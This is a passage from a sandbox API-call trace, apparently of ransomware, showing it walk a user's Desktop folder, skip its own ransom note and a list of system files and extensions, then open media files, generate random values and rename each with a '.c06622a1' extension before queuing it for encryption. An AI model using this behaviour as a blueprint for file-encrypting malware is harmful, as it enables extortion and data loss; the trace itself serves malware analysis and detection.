Buffer=0x2690094, Length=0x80) returned 0xd1ae9f9c [0156.573] RtlComputeCrc32 (PartialCrc=0x9f9c, Buffer=0x2690094, Length=0x80) returned 0x1820f0de [0156.573] RtlComputeCrc32 (PartialCrc=0xf0de, Buffer=0x2690094, Length=0x80) returned 0x7ea4a6d2 [0156.573] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0156.573] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.573] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.573] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8580690, ftCreationTime.dwHighDateTime=0x1d5e53d, ftLastAccessTime.dwLowDateTime=0x681fa380, ftLastAccessTime.dwHighDateTime=0x1d5dad9, ftLastWriteTime.dwLowDateTime=0x681fa380, ftLastWriteTime.dwHighDateTime=0x1d5dad9, nFileSizeHigh=0x0, nFileSizeLow=0x166f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="E5CGTZcxThC.mkv", cAlternateFileName="E5CGTZ~1.MKV")) returned 1 [0156.573] _wcsicmp (_Str1="E5CGTZcxThC.mkv", _Str2="README.c06622a1.TXT") returned -13 [0156.574] wcsstr (_Str="E5CGTZcxThC.mkv", _SubStr="README") returned 0x0 [0156.574] _wcsicmp (_Str1="autorun.inf", _Str2="E5CGTZcxThC.mkv") returned -4 [0156.574] wcslen (_String="autorun.inf") returned 0xb [0156.574] _wcsicmp (_Str1="boot.ini", _Str2="E5CGTZcxThC.mkv") returned -3 [0156.574] wcslen (_String="boot.ini") returned 0x8 [0156.574] _wcsicmp (_Str1="bootfont.bin", _Str2="E5CGTZcxThC.mkv") returned -3 [0156.574] wcslen (_String="bootfont.bin") returned 0xc [0156.574] _wcsicmp (_Str1="bootsect.bak", _Str2="E5CGTZcxThC.mkv") returned -3 [0156.574] wcslen (_String="bootsect.bak") returned 0xc [0156.574] _wcsicmp (_Str1="desktop.ini", _Str2="E5CGTZcxThC.mkv") returned -1 [0156.574] wcslen (_String="desktop.ini") returned 0xb [0156.574] _wcsicmp (_Str1="iconcache.db", _Str2="E5CGTZcxThC.mkv") returned 4 [0156.574] wcslen (_String="iconcache.db") returned 0xc [0156.574] _wcsicmp (_Str1="ntldr", _Str2="E5CGTZcxThC.mkv") returned 9 [0156.574] wcslen (_String="ntldr") returned 0x5 [0156.574] _wcsicmp (_Str1="ntuser.dat", _Str2="E5CGTZcxThC.mkv") returned 9 [0156.574] wcslen (_String="ntuser.dat") returned 0xa [0156.574] _wcsicmp (_Str1="ntuser.dat.log", _Str2="E5CGTZcxThC.mkv") returned 9 [0156.574] wcslen (_String="ntuser.dat.log") returned 0xe [0156.574] _wcsicmp (_Str1="ntuser.ini", _Str2="E5CGTZcxThC.mkv") returned 9 [0156.574] wcslen (_String="ntuser.ini") returned 0xa [0156.574] _wcsicmp (_Str1="thumbs.db", _Str2="E5CGTZcxThC.mkv") returned 15 [0156.574] wcslen (_String="thumbs.db") returned 0x9 [0156.574] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.574] wcslen (_String="386") returned 0x3 [0156.574] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.574] wcslen (_String="adv") returned 0x3 [0156.574] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.574] wcslen (_String="ani") returned 0x3 [0156.574] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.574] wcslen (_String="bat") returned 0x3 [0156.574] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.574] wcslen (_String="bin") returned 0x3 [0156.575] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.575] wcslen (_String="cab") returned 0x3 [0156.575] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.575] wcslen (_String="cmd") returned 0x3 [0156.575] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.575] wcslen (_String="com") returned 0x3 [0156.575] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.575] wcslen (_String="cpl") returned 0x3 [0156.575] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.575] wcslen (_String="cur") returned 0x3 [0156.575] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.575] wcslen (_String="deskthemepack") returned 0xd [0156.575] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.575] wcslen (_String="diagcab") returned 0x7 [0156.575] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.575] wcslen (_String="diagcfg") returned 0x7 [0156.575] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.575] wcslen (_String="diagpkg") returned 0x7 [0156.575] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.575] wcslen (_String="dll") returned 0x3 [0156.575] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.575] wcslen (_String="drv") returned 0x3 [0156.575] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.575] wcslen (_String="exe") returned 0x3 [0156.575] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.575] wcslen (_String="hlp") returned 0x3 [0156.575] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.575] wcslen (_String="icl") returned 0x3 [0156.575] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.575] wcslen (_String="icns") returned 0x4 [0156.575] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.575] wcslen (_String="ico") returned 0x3 [0156.575] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.575] wcslen (_String="ics") returned 0x3 [0156.575] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.575] wcslen (_String="idx") returned 0x3 [0156.576] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.576] wcslen (_String="ldf") returned 0x3 [0156.576] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.576] wcslen (_String="lnk") returned 0x3 [0156.576] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.576] wcslen (_String="mod") returned 0x3 [0156.576] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.576] wcslen (_String="mpa") returned 0x3 [0156.576] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.576] wcslen (_String="msc") returned 0x3 [0156.576] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.576] wcslen (_String="msp") returned 0x3 [0156.576] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.576] wcslen (_String="msstyles") returned 0x8 [0156.576] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.576] wcslen (_String="msu") returned 0x3 [0156.576] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.576] wcslen (_String="nls") returned 0x3 [0156.576] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.576] wcslen (_String="nomedia") returned 0x7 [0156.576] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.576] wcslen (_String="ocx") returned 0x3 [0156.576] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.576] wcslen (_String="prf") returned 0x3 [0156.576] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.576] wcslen (_String="ps1") returned 0x3 [0156.576] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.576] wcslen (_String="rom") returned 0x3 [0156.576] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.576] wcslen (_String="rtp") returned 0x3 [0156.576] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.576] wcslen (_String="scr") returned 0x3 [0156.576] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.576] wcslen (_String="shs") returned 0x3 [0156.577] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.577] wcslen (_String="spl") returned 0x3 [0156.577] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.577] wcslen (_String="sys") returned 0x3 [0156.577] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.577] wcslen (_String="theme") returned 0x5 [0156.577] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.577] wcslen (_String="themepack") returned 0x9 [0156.577] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.577] wcslen (_String="wpx") returned 0x3 [0156.577] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.577] wcslen (_String="lock") returned 0x4 [0156.577] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.577] wcslen (_String="key") returned 0x3 [0156.577] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.577] wcslen (_String="hta") returned 0x3 [0156.577] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.577] wcslen (_String="msi") returned 0x3 [0156.577] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.577] wcslen (_String="pdb") returned 0x3 [0156.577] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.577] wcslen (_String="sqlite") returned 0x6 [0156.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.577] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.577] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.577] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.577] wcscpy (in: _Dest=0x32400d0, _Source="E5CGTZcxThC.mkv" | out: _Dest="E5CGTZcxThC.mkv") returned="E5CGTZcxThC.mkv" [0156.577] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv", dwFileAttributes=0x80) returned 1 [0156.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\e5cgtzcxthc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0156.578] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.578] ReadFile (in: hFile=0x1bc, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.579] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xa797bde [0156.579] RtlComputeCrc32 (PartialCrc=0x7bde, Buffer=0x32e9a4, Length=0x80) returned 0x4711f871 [0156.579] RtlComputeCrc32 (PartialCrc=0xf871, Buffer=0x32e9a4, Length=0x80) returned 0x1ed8a35d [0156.579] RtlComputeCrc32 (PartialCrc=0xa35d, Buffer=0x32e9a4, Length=0x80) returned 0x5870a4fb [0156.579] RtlComputeCrc32 (PartialCrc=0xa4fb, Buffer=0x32e9a4, Length=0x80) returned 0x8d19e8fe [0156.579] CloseHandle (hObject=0x1bc) returned 1 [0156.579] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.579] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv" [0156.579] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv") returned 0x47 [0156.579] wcscpy (in: _Dest=0x32500f6, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.579] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\e5cgtzcxthc.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\e5cgtzcxthc.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\E5CGTZcxThC.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\e5cgtzcxthc.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0156.583] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.583] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0156.601] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65f322d7 [0156.601] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4447d4a [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f96534d [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73399a7e [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f0d54d7 [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1745d6af [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3c9aaa89 [0156.602] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58e6c37d [0156.605] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x9514a29b [0156.605] RtlComputeCrc32 (PartialCrc=0xa29b, Buffer=0x2b70094, Length=0x80) returned 0x9c89a740 [0156.605] RtlComputeCrc32 (PartialCrc=0xa740, Buffer=0x2b70094, Length=0x80) returned 0xad17cda5 [0156.605] RtlComputeCrc32 (PartialCrc=0xcda5, Buffer=0x2b70094, Length=0x80) returned 0x7542db99 [0156.605] RtlComputeCrc32 (PartialCrc=0xdb99, Buffer=0x2b70094, Length=0x80) returned 0x902985fe [0156.605] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0156.605] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0156.605] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0156.605] FindNextFileW (in: hFindFile=0x17c1d0, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6df26d40, ftCreationTime.dwHighDateTime=0x1d5dbb7, ftLastAccessTime.dwLowDateTime=0xbaa490e0, ftLastAccessTime.dwHighDateTime=0x1d5da00, ftLastWriteTime.dwLowDateTime=0xbaa490e0, ftLastWriteTime.dwHighDateTime=0x1d5da00, nFileSizeHigh=0x0, nFileSizeLow=0xa7a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="H5q20OMLtY.mp3", cAlternateFileName="H5Q20O~1.MP3")) returned 1 [0156.605] _wcsicmp (_Str1="H5q20OMLtY.mp3", _Str2="README.c06622a1.TXT") returned -10 [0156.605] wcsstr (_Str="H5q20OMLtY.mp3", _SubStr="README") returned 0x0 [0156.605] _wcsicmp (_Str1="autorun.inf", _Str2="H5q20OMLtY.mp3") returned -7 [0156.605] wcslen (_String="autorun.inf") returned 0xb [0156.605] _wcsicmp (_Str1="boot.ini", _Str2="H5q20OMLtY.mp3") returned -6 [0156.605] wcslen (_String="boot.ini") returned 0x8 [0156.605] _wcsicmp (_Str1="bootfont.bin", _Str2="H5q20OMLtY.mp3") returned -6 [0156.605] wcslen (_String="bootfont.bin") returned 0xc [0156.605] _wcsicmp (_Str1="bootsect.bak", _Str2="H5q20OMLtY.mp3") returned -6 [0156.605] wcslen (_String="bootsect.bak") returned 0xc [0156.605] _wcsicmp (_Str1="desktop.ini", _Str2="H5q20OMLtY.mp3") returned -4 [0156.606] wcslen (_String="desktop.ini") returned 0xb [0156.606] _wcsicmp (_Str1="iconcache.db", _Str2="H5q20OMLtY.mp3") returned 1 [0156.606] wcslen (_String="iconcache.db") returned 0xc [0156.606] _wcsicmp (_Str1="ntldr", _Str2="H5q20OMLtY.mp3") returned 6 [0156.606] wcslen (_String="ntldr") returned 0x5 [0156.606] _wcsicmp (_Str1="ntuser.dat", _Str2="H5q20OMLtY.mp3") returned 6 [0156.606] wcslen (_String="ntuser.dat") returned 0xa [0156.606] _wcsicmp (_Str1="ntuser.dat.log", _Str2="H5q20OMLtY.mp3") returned 6 [0156.606] wcslen (_String="ntuser.dat.log") returned 0xe [0156.606] _wcsicmp (_Str1="ntuser.ini", _Str2="H5q20OMLtY.mp3") returned 6 [0156.606] wcslen (_String="ntuser.ini") returned 0xa [0156.606] _wcsicmp (_Str1="thumbs.db", _Str2="H5q20OMLtY.mp3") returned 12 [0156.606] wcslen (_String="thumbs.db") returned 0x9 [0156.606] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0156.606] wcslen (_String="386") returned 0x3 [0156.606] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0156.606] wcslen (_String="adv") returned 0x3 [0156.606] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0156.606] wcslen (_String="ani") returned 0x3 [0156.606] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0156.606] wcslen (_String="bat") returned 0x3 [0156.606] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0156.606] wcslen (_String="bin") returned 0x3 [0156.606] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0156.606] wcslen (_String="cab") returned 0x3 [0156.606] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0156.606] wcslen (_String="cmd") returned 0x3 [0156.606] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0156.606] wcslen (_String="com") returned 0x3 [0156.606] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0156.606] wcslen (_String="cpl") returned 0x3 [0156.606] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0156.606] wcslen (_String="cur") returned 0x3 [0156.607] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0156.607] wcslen (_String="deskthemepack") returned 0xd [0156.607] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0156.607] wcslen (_String="diagcab") returned 0x7 [0156.607] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0156.607] wcslen (_String="diagcfg") returned 0x7 [0156.607] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0156.607] wcslen (_String="diagpkg") returned 0x7 [0156.607] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0156.607] wcslen (_String="dll") returned 0x3 [0156.607] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0156.607] wcslen (_String="drv") returned 0x3 [0156.607] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0156.607] wcslen (_String="exe") returned 0x3 [0156.607] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0156.607] wcslen (_String="hlp") returned 0x3 [0156.607] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0156.607] wcslen (_String="icl") returned 0x3 [0156.607] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0156.607] wcslen (_String="icns") returned 0x4 [0156.607] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0156.607] wcslen (_String="ico") returned 0x3 [0156.607] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0156.607] wcslen (_String="ics") returned 0x3 [0156.607] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0156.607] wcslen (_String="idx") returned 0x3 [0156.607] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0156.607] wcslen (_String="ldf") returned 0x3 [0156.607] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0156.607] wcslen (_String="lnk") returned 0x3 [0156.607] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0156.607] wcslen (_String="mod") returned 0x3 [0156.607] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0156.608] wcslen (_String="mpa") returned 0x3 [0156.608] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0156.608] wcslen (_String="msc") returned 0x3 [0156.608] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0156.608] wcslen (_String="msp") returned 0x3 [0156.608] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0156.608] wcslen (_String="msstyles") returned 0x8 [0156.608] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0156.608] wcslen (_String="msu") returned 0x3 [0156.608] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0156.608] wcslen (_String="nls") returned 0x3 [0156.608] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0156.608] wcslen (_String="nomedia") returned 0x7 [0156.608] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0156.608] wcslen (_String="ocx") returned 0x3 [0156.608] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0156.608] wcslen (_String="prf") returned 0x3 [0156.608] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0156.608] wcslen (_String="ps1") returned 0x3 [0156.608] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0156.608] wcslen (_String="rom") returned 0x3 [0156.608] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0156.608] wcslen (_String="rtp") returned 0x3 [0156.608] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0156.608] wcslen (_String="scr") returned 0x3 [0156.608] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0156.608] wcslen (_String="shs") returned 0x3 [0156.608] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0156.608] wcslen (_String="spl") returned 0x3 [0156.608] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0156.608] wcslen (_String="sys") returned 0x3 [0156.608] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0156.608] wcslen (_String="theme") returned 0x5 [0156.609] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0156.609] wcslen (_String="themepack") returned 0x9 [0156.609] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0156.609] wcslen (_String="wpx") returned 0x3 [0156.609] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0156.609] wcslen (_String="lock") returned 0x4 [0156.609] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0156.609] wcslen (_String="key") returned 0x3 [0156.609] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0156.609] wcslen (_String="hta") returned 0x3 [0156.609] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0156.609] wcslen (_String="msi") returned 0x3 [0156.609] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0156.609] wcslen (_String="pdb") returned 0x3 [0156.609] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0156.609] wcslen (_String="sqlite") returned 0x6 [0156.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr")) returned 0x10 [0156.609] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0156.609] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR" [0156.609] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR") returned 0x37 [0156.609] wcscpy (in: _Dest=0x32400d0, _Source="H5q20OMLtY.mp3" | out: _Dest="H5q20OMLtY.mp3") returned="H5q20OMLtY.mp3" [0156.609] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3", dwFileAttributes=0x80) returned 1 [0156.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\h5q20omlty.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0156.610] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.610] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0156.611] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xd3c903ba [0156.611] RtlComputeCrc32 (PartialCrc=0x3ba, Buffer=0x32e9a4, Length=0x80) returned 0x4534ff8b [0156.611] RtlComputeCrc32 (PartialCrc=0xff8b, Buffer=0x32e9a4, Length=0x80) returned 0xda045777 [0156.611] RtlComputeCrc32 (PartialCrc=0x5777, Buffer=0x32e9a4, Length=0x80) returned 0xab7629cf [0156.611] RtlComputeCrc32 (PartialCrc=0x29cf, Buffer=0x32e9a4, Length=0x80) returned 0x42d0874a [0156.611] CloseHandle (hObject=0x1d0) returned 1 [0156.611] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0156.611] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3" [0156.611] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3") returned 0x46 [0156.611] wcscpy (in: _Dest=0x32500f4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.611] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ziqq01cnhjjwr\\h5q20omlty.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZIqq01CnHJJwR\\H5q20OMLtY.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js 